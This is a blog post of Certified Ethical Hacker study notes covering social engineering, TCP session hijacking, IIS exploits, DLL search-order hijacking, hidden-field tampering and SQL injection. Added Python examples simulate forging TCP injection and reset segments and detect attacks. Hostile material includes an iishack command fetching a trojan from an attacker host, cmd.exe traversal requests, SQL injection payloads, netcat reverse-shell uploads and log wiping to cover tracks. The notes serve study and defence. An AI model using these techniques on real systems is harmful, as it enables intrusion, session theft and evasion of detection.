Friday, February 19, 2010

Certified Ethical Hacker 5

Social engineering is the human-interaction portion of hacking, and these notes put it at around 50% of the actual attack. It affects all levels of security in a company: employees may unknowingly give away crucial information over the phone or at a common hangout.
Social engineering is the art of manipulation: using an employee's trust, and ultimately that employee's credentials, against the network. The credentials are handed over because the victim feels trust in, or believes, the attacker. The goal of a good social engineer is to remove any hesitation the employee has about giving out information. Hackers prey on human weaknesses.

Human weakness is the weakest link in security. To defend the network successfully, employees need to be educated; hardware and software alone cannot defend against social engineering.

Social engineering can be either personal or technical. Personal social engineering uses ordinary human interaction to obtain the needed information; technical social engineering uses the computer to retrieve it, for example through email phishing.

Impersonation is a big part of social engineering. It is a third-person approach: the attacker poses as someone else, such as technical support staff or a technical director. A good social engineer is a good listener.

You can also shoulder-surf at hangout spots to grab passwords, or dumpster-dive wherever the company disposes of its waste.

Technical social engineering includes email attachments and chat sessions. Cross-site scripting can also be employed.

Reverse social engineering is to impersonate someone important and then get the victim to share classified information. Rather than asking the victim for help, the attacker arranges things so that the victim comes to the attacker for help, and while being helped the victim divulges information about the network. The three parts of reverse social engineering are:
1) Sabotage
2) Advertising
3) Assisting

You should have good policies about social engineering implemented in the company, and they should be enforced among all staff. One way to deter a social engineer is to require two or more authentication factors:
-Something you know - Password
-Something you have - Smartcard
-Something you are - Biometrics

Session hijacking requires understanding the flow of packets over the network and dissecting each vendor's implementation of TCP. To hijack sessions effectively we must know the security issues and basic attack methods of IPv4, and what is involved in the communication between two endpoints.

Spoofing is impersonation: creating a fake identity. Hijacking, on the other hand, takes over an existing session rather than creating a fake identity, so it requires a victim who has already authenticated legitimately. During a hijack we infiltrate the session and then kill the victim's side of the connection.

Steps in Session Hijacking are:
1) Monitor and track the session
2) Desynchronize the connection
3) Insert your attack into that session stream

Session hijacking typically allows only one or two commands to be injected into the session, so scripting should be used to prepare them in advance.

There are two types of hijacking. In an active attack the attacker takes over the session. In a passive hijack the attacker finds a session but only monitors and records it for later use; this is also known as sniffing.

Sequence numbers are 32-bit values that increase throughout a TCP session. The acknowledgment number sent by a receiver is the next sequence number it is ready to receive. Session hijacking programs include:
-Juggernaut (Linux)
-TTY Watcher
-Hunt (Linux)
-IP Watcher
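The three steps above, worked through in code. This is an added example, not code from the notes or from any of the tools listed: it parses and builds raw TCP segments with the standard library, computes the seq/ack values an injected segment needs from two sniffed segments, and shows why the real client is desynchronized afterwards. The two "sniffed" segments, the addresses and the ports are constructed for the example; nothing is transmitted (sending spoofed segments needs raw sockets and a live session).

```python
import struct

MASK32 = 0xFFFFFFFF
FLAG_FIN, FLAG_SYN, FLAG_RST, FLAG_PSH, FLAG_ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def parse_tcp(segment):
    """Step 1 (monitor): pull ports, seq/ack, flags and payload out of a sniffed TCP segment."""
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x1FF, "window": window, "payload": segment[data_offset:]}


def tcp_checksum(src_ip, dst_ip, segment):
    """One's-complement checksum over the IPv4 pseudo-header plus the whole segment."""
    data = src_ip + dst_ip + struct.pack("!BBH", 0, 6, len(segment)) + segment
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, payload, window=8192):
    """Build a 20-byte TCP header (no options) plus payload, with a valid checksum."""
    header = struct.pack("!HHIIHHHH", sport, dport, seq & MASK32, ack & MASK32,
                         (5 << 12) | flags, window, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, header + payload)
    return header[:16] + struct.pack("!H", csum) + header[18:] + payload


def next_seq(seg):
    """Sequence number of the first byte after this segment; SYN and FIN each consume one."""
    consumed = len(seg["payload"])
    if seg["flags"] & FLAG_SYN:
        consumed += 1
    if seg["flags"] & FLAG_FIN:
        consumed += 1
    return (seg["seq"] + consumed) & MASK32


def forge_injection(client_ip, server_ip, client_seg, server_seg, payload):
    """Step 3 (inject): a segment the server accepts as the client's next data.
    seq = the byte the server expects next; ack = the byte the client would acknowledge next."""
    return build_tcp(client_ip, server_ip, client_seg["sport"], client_seg["dport"],
                     next_seq(client_seg), next_seq(server_seg), FLAG_PSH | FLAG_ACK, payload)


def forge_reset(server_ip, client_ip, client_seg, server_seg):
    """Kill the victim's side: a spoofed RST 'from the server' carrying the seq the client expects."""
    return build_tcp(server_ip, client_ip, client_seg["dport"], client_seg["sport"],
                     next_seq(server_seg), next_seq(client_seg), FLAG_RST | FLAG_ACK, b"")


def simulate_hijack():
    """Run the three steps against two constructed segments of a telnet session."""
    client_ip, server_ip = bytes([10, 0, 0, 5]), bytes([10, 0, 0, 23])   # constructed addresses
    # Step 1: two segments as a sniffer would see them (constructed, not a real capture).
    c_raw = build_tcp(client_ip, server_ip, 40000, 23, 1000, 5000, FLAG_PSH | FLAG_ACK, b"ls\r\n")
    s_raw = build_tcp(server_ip, client_ip, 23, 40000, 5000, 1004, FLAG_PSH | FLAG_ACK, b"file1\r\n")
    c_seg, s_seg = parse_tcp(c_raw), parse_tcp(s_raw)
    # Steps 2 and 3: inject a command as the client. The server then expects seq 1004 + 4 = 1008,
    # but the real client will send its next byte as seq 1004: the connection is desynchronized.
    forged_raw = forge_injection(client_ip, server_ip, c_seg, s_seg, b"id\r\n")
    forged = parse_tcp(forged_raw)
    server_expects = next_seq(forged)
    client_next = next_seq(c_seg)
    reset = parse_tcp(forge_reset(server_ip, client_ip, c_seg, s_seg))
    return {"forged": forged, "reset": reset,
            "server_expects_after": server_expects, "client_next_seq": client_next,
            "client_desynced": client_next != server_expects,
            "checksum_ok": tcp_checksum(client_ip, server_ip, forged_raw) == 0}


if __name__ == "__main__":
    print(simulate_hijack())
```

The desynchronization is the point of step 2: once the server has accepted 4 injected bytes, every segment the real client sends is "behind" by 4, the server keeps acknowledging 1008, the client keeps re-asserting 1004, and the two sides loop until the forged RST ends the victim's side.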

T-Sight can very easily take over Telnet sessions and supports both passive and active hijacking: you can watch an active session in real time passively, or take it over for an active hijack. The victim of the hijack sees "Connection to host lost" when the session is taken.

A web server is just a service that listens for HTTP requests; examples are Apache and IIS. These servers have known vulnerabilities that let attackers get more information from the web server than the administrator intends. The file structure of an Apache server can be enumerated using long URLs, and ISAPI buffer overflows in IIS are frequently exploited.

A common tool used against IIS 4 is iishack.exe, which performs a buffer-overflow attack. The syntax is:
iishack <victim-host> 80 <attacker-host>/trojan.exe
where <victim-host> is the victim's web server, 80 is its listening port, <attacker-host> is the attacker's web server and trojan.exe is the payload hosted there, waiting to be fetched onto the victim.

Internet Printing Protocol (IPP) support in IIS on Windows 2000 was vulnerable to a buffer overflow. The IISLockdown and URLScan utilities help; if IPP is not used, disable it. Also install service packs and hotfixes promptly.

ISAPI.dll can be exploited through netcat, which can be used to retrieve the actual source code of server-side applications.

IIS directory traversal is a vulnerability that works by confusing the URL parser. Basic DOS commands can be executed through malformed URLs in which characters are replaced by their hexadecimal (percent-encoded) equivalents: the encoded traversal sequence slips past the check for "..", but is still decoded into a path that steps out of the web root. For example, such a URL can translate to running "dir C:\". Almost any other DOS command works the same way, including deleting a file such as \important.doc.

This attack is also known as the Unicode Attack.
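Detection logic for the traversal pattern described above, as an added example that is not part of the notes: a canonicalizer that percent-decodes a request path repeatedly (so double-encoded forms such as %255c are caught), accepts the overlong UTF-8 sequences the Unicode Attack relied on (%c0%af and %e0%80%af both decode to "/"), treats both slash kinds as separators, and reports whether the request walks out of the web root. The log lines it scans are constructed for the example in a W3C-style field order that is assumed here, not taken from a real IIS log.

```python
import re
from urllib.parse import unquote_to_bytes


def lenient_utf8(data):
    """Decode UTF-8 the way the vulnerable parser did: overlong forms such as
    C0 AF or E0 80 AF are accepted and map to '/' instead of being rejected."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        elif 0xE0 <= b <= 0xEF and i + 2 < len(data) and all(0x80 <= x <= 0xBF for x in data[i + 1:i + 3]):
            out.append(chr(((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)))
            i += 3
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def canonicalize(url):
    """Return (normalized path, escaped_webroot). Percent-decoding is repeated so that
    double-encoded forms like %255c (-> %5c -> '\\') are caught; '/' and '\\' both split segments."""
    data = url.split("?", 1)[0].encode("latin-1")
    for _ in range(3):                       # bounded: each pass strips one layer of encoding
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    escaped, stack = False, []
    for seg in re.split(r"[\\/]+", lenient_utf8(data)):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True               # '..' applied at the web root: the request left the tree
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped


# Constructed log lines; assumed field order: date time c-ip method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2001-05-04 10:02:11 192.0.2.10 GET /images/logo.gif - 200
2001-05-04 10:02:15 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-04 10:02:19 192.0.2.77 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-04 10:02:23 192.0.2.10 GET /docs/../index.html - 200
"""


def flag_traversals(log_text):
    """Return (client ip, uri-stem) for every request whose canonical path leaves the web root."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, stem = fields[2], fields[4]
        if canonicalize(stem)[1]:
            hits.append((client, stem))
    return hits


if __name__ == "__main__":
    for hit in flag_traversals(SAMPLE_LOG):
        print(hit)
```

Note that a plain "/docs/../index.html" is not flagged: a ".." that stays inside the web root is ordinary, and what distinguishes the attack is a traversal that crosses the root after decoding.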

A number of tools automate directory traversal, for example IISxploit.exe. Unicodeuploader.pl uploads files to a vulnerable web server. cmdasp.asp can be used to upload netcat (nc.exe) to the web server, which can then push a shell back to the attacker's PC. After uploading netcat, hk.exe can be used to escalate privileges. This has been patched on IIS 5.0.

ISPC.exe is used together with a malicious ISAPI DLL planted on the server: once the DLL is in place, the attacker runs ISPC.exe to connect to it and get a remote shell.

The Unspecified Executable Path vulnerability occurs when executables and DLL files are referenced in the registry without a full path. Windows 2000 then searches for the file in this order:
1) Directory from which the application was loaded
2) Current working directory of the process
3) System32 directory
4) System directory
5) Windows directory
6) Directories specified in the PATH environment variable
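A model of that search order, as an added example that is not from the notes and is not the real Windows loader (which also honours KnownDLLs and, on later systems, SafeDllSearchMode): it resolves a bare module name through the six locations above, lists the writable directories that are consulted before the legitimate copy, and shows a planted file in the current directory winning over the real one in the System32 stand-in. The directory layout and the "DLL" contents are constructed in a temporary directory; the names app_dir, cwd and so on are this example's keys, not Windows terms.

```python
import os
import tempfile

# Legacy (Windows 2000, SafeDllSearchMode off) search order from the notes above, as map keys;
# "path" holds the list of PATH directories.
SEARCH_ORDER = ("app_dir", "cwd", "system32", "system", "windows", "path")


def search_dirs(dirs):
    """Flatten a {key: directory or [directories]} map into the order the loader would walk."""
    ordered = []
    for key in SEARCH_ORDER:
        value = dirs.get(key)
        if value is None:
            continue
        ordered.extend(value if isinstance(value, (list, tuple)) else [value])
    return ordered


def resolve_module(name, dirs):
    """First directory in search order that contains `name`: what a path-less load would pick up."""
    for directory in search_dirs(dirs):
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate):
            return candidate
    return None


def hijack_points(name, dirs):
    """Writable directories searched *before* the one that currently holds `name`:
    planting a same-named file in any of them wins the lookup."""
    current = resolve_module(name, dirs)
    points = []
    for directory in search_dirs(dirs):
        if current is not None and os.path.join(directory, name) == current:
            break
        if os.access(directory, os.W_OK):
            points.append(directory)
    return points


def demo():
    """Constructed layout: helper.dll lives only in the system32 stand-in; the app and cwd
    stand-ins are writable, so a copy planted in cwd is resolved instead of the real one."""
    root = tempfile.mkdtemp()
    dirs = {key: os.path.join(root, key) for key in ("app_dir", "cwd", "system32", "system", "windows")}
    for directory in dirs.values():
        os.makedirs(directory)
    dirs["path"] = [os.path.join(root, "pathdir")]
    os.makedirs(dirs["path"][0])
    name = "helper.dll"                       # hypothetical module name
    with open(os.path.join(dirs["system32"], name), "wb") as f:
        f.write(b"MZ legitimate")             # constructed stand-in, not a real DLL
    before = os.path.basename(os.path.dirname(resolve_module(name, dirs)))
    exposed = [os.path.basename(d) for d in hijack_points(name, dirs)]
    with open(os.path.join(dirs["cwd"], name), "wb") as f:
        f.write(b"MZ planted")                # attacker's copy in a directory searched earlier
    after = os.path.basename(os.path.dirname(resolve_module(name, dirs)))
    return {"before": before, "hijackable": exposed, "after": after}


if __name__ == "__main__":
    print(demo())
```

The fix implied by the notes follows directly from the model: a registry entry that carries the full path never consults the earlier directories, so the writable ones stop mattering.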

CleanIISLog can remove specific entries from IIS logs. An attacker can specify a rule such as "remove entries containing a certain IP address" and the tool applies it automatically, which makes it very useful for covering tracks.

To counter file-system traversal, give cmd.exe the least privileges possible, remove execute permission from the IUSR account, and apply the latest service packs and hotfixes.

UpdateExpert is a program that makes sure that a Windows system is up to date with patches.

cacls.exe is a built-in Windows 2000 utility for displaying and changing file ACLs from the command line. The following grants Full Control to System and Administrators on every .exe in the current directory and all subdirectories (/T); because /E is not given, the existing ACL is replaced rather than edited, which is what removes the IUSR account's access:
cacls.exe *.exe /T /G System:F Administrators:F

Stealth HTTP Scanner (N-Stealth) checks for over 18,000 HTTP security issues and presents the results in an HTML report. N-Stealth is often used in penetration tests.

Vulnerabilities common to Web Applications
-Who's the real client?
-Special characters detection and correction
-HTML output character filtering
-Authorization of web applications
-Scripted authentication
-User authentications

Web application penetration methodologies
- Reconnaissance
We have to document the application and the website. We fingerprint the platform, find out how it handles errors, and then enumerate the file and application structure.

Instant Source from BlazingTool lets you view client-side script source from within the browser. Lynx is a text browser that can download every file and link on each HTML page of a site recursively (similar to wget). BlackWidow from SoftByteLabs is a crawler that maps the entire structure of a site. WebSleuth is another crawler, and it can work through a proxy.

Hidden form fields are typically used to carry data between pages. Developers assume that users will not change them, but attackers routinely manipulate hidden fields. For example, if a hidden field stores the price of a purchase, it can be modified so the attacker pays less.

A proxy placed between the client and the server lets us manipulate the data exchanged. Burp Proxy is one example: it intercepts HTTP requests and responses on the fly and lets the user modify them before they are forwarded.
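The price-tampering case from the two paragraphs above, as an added example that is not from the notes: a checkout that trusts the hidden price field, the hardened version that ignores the client's price and looks the item up server-side, and, for values that genuinely must round-trip through the browser, an HMAC-signed hidden field that detects edits made in a proxy. The form bodies, the catalogue and the key are constructed for the example; the parser is a minimal stand-in for a real form decoder.

```python
import hashlib
import hmac
from decimal import Decimal

# Constructed server-side catalogue: the only place a price should ever come from.
CATALOG = {"SKU-100": Decimal("49.99"), "SKU-200": Decimal("199.00")}
SERVER_KEY = b"constructed-demo-key"     # a real deployment keeps this secret and out of the code


def parse_form(body):
    """Minimal application/x-www-form-urlencoded parser (the sample bodies need no percent-decoding)."""
    return dict(pair.split("=", 1) for pair in body.split("&") if "=" in pair)


def total_vulnerable(form):
    """Trusts the hidden 'price' field the page sent out: whatever was edited in the proxy is accepted."""
    return Decimal(form["price"]) * int(form["qty"])


def total_hardened(form):
    """Ignores any price the client sent; looks the item up server-side and validates the quantity."""
    sku = form.get("sku")
    if sku not in CATALOG:
        raise ValueError("unknown item")
    qty = int(form.get("qty", "0"))
    if not 1 <= qty <= 100:
        raise ValueError("bad quantity")
    return CATALOG[sku] * qty


def sign_hidden(value):
    """For state that must live in a hidden field: append an HMAC so edits are detectable."""
    mac = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def verify_hidden(field):
    """Return the original value if the MAC checks out, else None (treat as a tampered request)."""
    value, _, mac = field.rpartition("|")
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if mac and hmac.compare_digest(mac, expected) else None


if __name__ == "__main__":
    original = "sku=SKU-100&price=49.99&qty=2"           # constructed form body as the page sent it
    tampered = "sku=SKU-100&price=0.01&qty=2"            # the same body after editing in a proxy
    print("vulnerable:", total_vulnerable(parse_form(tampered)))
    print("hardened:  ", total_hardened(parse_form(tampered)))
    signed = sign_hidden("49.99")
    print("signed field verifies:", verify_hidden(signed))
    print("edited signed field:  ", verify_hidden(signed.replace("49.99", "0.01", 1)))
```

The hardened checkout is the right default: a signed hidden field only proves the value came from the server unchanged, it does not stop a user replaying a legitimately signed older price, so use it for state that has no authoritative server-side copy, not for prices.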

WINHLP32.exe had a buffer-overflow vulnerability that could execute malicious code with the privileges of the logged-in user.

SQL injection can come in many forms. A first test is to put a single quotation mark (') in a form field and submit it, and then to try any other symbol that might cause an error. Once an error occurs, the error message usually reveals which back-end database is running.
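The single-quote probe and what it reveals, as an added example that is not from the notes: a login query built by string concatenation beside the same query with bound parameters, run against a constructed in-memory SQLite table (standing in for whatever back end the application uses). The lone quote breaks the concatenated query and surfaces the database's own error text, the tautology and comment payloads bypass it, and the parameterized version treats all three inputs as plain data.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the application's back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: the form input becomes part of the SQL."""
    sql = "SELECT username FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as err:
        return ("error", str(err))       # the error text is what fingerprints the back end
    return ("ok", row[0]) if row else ("denied", None)


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the quote is data, never syntax."""
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return ("ok", row[0]) if row else ("denied", None)


def probe(conn):
    """The notes' first test (a lone single quote), then a tautology and a comment payload."""
    return {
        "quote_vuln": login_vulnerable(conn, "'", "x"),
        "quote_safe": login_parameterized(conn, "'", "x"),
        "bypass_vuln": login_vulnerable(conn, "alice", "' OR '1'='1"),
        "bypass_safe": login_parameterized(conn, "alice", "' OR '1'='1"),
        "comment_vuln": login_vulnerable(conn, "bob'--", "anything"),
        "comment_safe": login_parameterized(conn, "bob'--", "anything"),
    }


if __name__ == "__main__":
    for name, result in probe(make_db()).items():
        print(name, result)
```

The "error" result is the signal the notes describe: the message text comes from the database engine itself, which is how the probe identifies the back end before any data is extracted.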

Tokens give a false sense of security, because the session can still be taken over after authentication is complete.
